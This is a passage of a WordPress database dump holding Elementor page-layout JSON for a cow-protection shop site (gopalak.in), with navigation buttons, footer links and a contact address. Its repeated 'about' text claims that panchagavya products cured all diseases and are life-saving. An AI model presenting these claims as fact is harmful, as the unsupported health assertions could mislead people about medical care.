,\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"08fdbe7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bc55a55\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dfae959\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11933,1977,'_elementor_page_assets','a:0:{}'),(11935,1978,'_elementor_edit_mode','builder'),(11936,1978,'_elementor_template_type','wp-page'),(11937,1978,'_elementor_version','3.7.8'),(11938,1978,'_wp_page_template','elementor_canvas'),(11939,1978,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11940,1978,'_elementor_page_assets','a:0:{}'),(11943,1981,'_elementor_edit_mode','builder'),(11944,1981,'_elementor_template_type','wp-page'),(11945,1981,'_elementor_version','3.7.8'),(11946,1981,'_wp_page_template','elementor_canvas'),(11947,1981,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\